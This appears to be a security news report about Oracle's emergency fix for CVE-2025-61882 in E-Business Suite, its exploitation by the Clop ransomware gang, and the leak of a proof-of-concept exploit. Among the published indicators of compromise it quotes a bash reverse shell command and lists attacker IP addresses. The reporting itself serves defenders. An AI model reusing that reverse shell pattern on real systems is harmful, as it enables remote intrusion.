Oracle Fixes Zero-Day Exploited in Clop Ransomware Attacks
▼ Summary
– Oracle has disclosed a critical zero-day vulnerability (CVE-2025-61882) in its E-Business Suite, enabling unauthenticated remote code execution and actively exploited in Clop ransomware data theft attacks.
– The flaw affects Oracle E-Business Suite versions 12.2.3-12.2.14, has a CVSS score of 9.8, and Oracle has released an emergency security update requiring prior installation of the October 2023 Critical Patch Update.
– The Clop ransomware gang exploited this vulnerability and others to steal data from Oracle E-Business Suite servers in August 2025, demanding ransoms to prevent data leaks.
– Indicators of compromise for the zero-day include specific IP addresses, a reverse shell command, and exploit files, with a public proof-of-concept exploit leaked by the Scattered Lapsus$ Hunters threat actor group.
– The exploit’s source is linked to Scattered Lapsus$ Hunters, who leaked it on Telegram, raising questions about their connection to Clop, though ShinyHunters claims the exploit was stolen and shared without authorization.
Oracle has issued an urgent security alert concerning a critical zero-day vulnerability, identified as CVE-2025-61882, which enables unauthenticated remote code execution within its E-Business Suite. This flaw, actively exploited by the Clop ransomware group in widespread data theft campaigns, affects the Oracle Concurrent Processing component, specifically BI Publisher Integration. With a maximum severity CVSS score of 9.8, the vulnerability can be exploited over a network without requiring any username or password, posing a severe risk to affected systems.
The vulnerability impacts Oracle E-Business Suite versions 12.2.3 through 12.2.14. Oracle has released an emergency security update to mitigate the threat. However, the company specifies that customers must first install the October 2023 Critical Patch Update before applying this new patch. Given that a public proof-of-concept exploit is available and active attacks are underway, administrators are urged to implement the update immediately to protect their environments.
Although Oracle did not initially label this as a zero-day, the company has since published indicators of compromise that match an exploit recently shared by threat actors on Telegram. Charles Carmakal, CTO at Mandiant, confirmed that CVE-2025-61882, along with other vulnerabilities patched in July, was weaponized by the Clop ransomware gang during data theft operations targeting Oracle E-Business Suite servers in August 2025. Carmakal explained on LinkedIn that Clop leveraged multiple security gaps, including one patched just this past weekend, to exfiltrate substantial amounts of data from numerous victims.
Reports of Clop’s latest extortion campaign surfaced last week when Mandiant and the Google Threat Intelligence Group began tracking a wave of emails sent to multiple companies. These messages, purportedly from the threat actors, claimed that Clop had successfully breached Oracle E-Business Suite systems, stolen confidential documents, and were now demanding ransom payments to prevent public leakage of the data. One such email shared with BleepingComputer read, “We are CL0P team. If you haven’t heard about us, you can google about us on internet. We have recently breached your Oracle E-Business Suite application and copied a lot of documents. All the private files and other information are now held on our systems.”
Clop later confirmed to BleepingComputer that they were responsible for the extortion emails and indicated they had exploited a previously unknown Oracle vulnerability to carry out the data theft. The group stated, “Soon all will become obvious that Oracle bugged up their core product and once again, the task is on clop to save the day.” Initially, Oracle attributed the campaign to flaws patched in July 2025, but it is now clear the recently disclosed zero-day was instrumental in the attacks.
Oracle has shared specific indicators of compromise associated with the exploitation, including two IP addresses, 200.107.207.26 and 185.181.60.11, linked to observed malicious activity involving HTTP GET and POST requests. Additionally, a command used to open a reverse shell was identified: “sh -c /bin/bash -i >& /dev/tcp// 0>&1”. File hashes for the exploit archive and its components were also published, matching a proof-of-concept package leaked online.
The zero-day exploit first came to light through a different threat actor collective calling themselves “Scattered Lapsus$ Hunters”. This group, which claims to include members from Scattered Spider, Lapsus$, and ShinyHunters, leaked two files on Telegram. One file, named “GIFTFROMCL0P.7z”, contained Oracle source code reportedly stolen during a February 2025 breach of Oracle Cloud. The other, an archive titled “ORACLEEBSNDAYEXPLOITPOCSCATTEREDLAPSUSRETARDCL0P_HUNTERS.zip”, was implied to be the actual exploit used by Clop.
BleepingComputer verified that this archive matches the one listed in Oracle’s indicators of compromise. The package includes a readme file and two Python scripts, exp.py and server.py, designed to exploit vulnerable Oracle E-Business Suite instances, enabling either arbitrary command execution or the establishment of a reverse shell connection to an attacker-controlled server. The appearance of this exploit in the wild raises questions about how Scattered Lapsus$ Hunters obtained it and whether they collaborate in any way with Clop.
ShinyHunters told BleepingComputer they believe an individual with whom they shared the exploit may have provided or sold it to Clop. They commented, “That was my exploit just like SAP, which was stolen by the CCP, and it upset me more that another one of my exploits was being exploited by another group in an unsuccessful way, so we leaked it. No hate to cl0p.” BleepingComputer reached out to Clop for clarification on this relationship but has not yet received a reply.
(Source: Bleeping Computer)
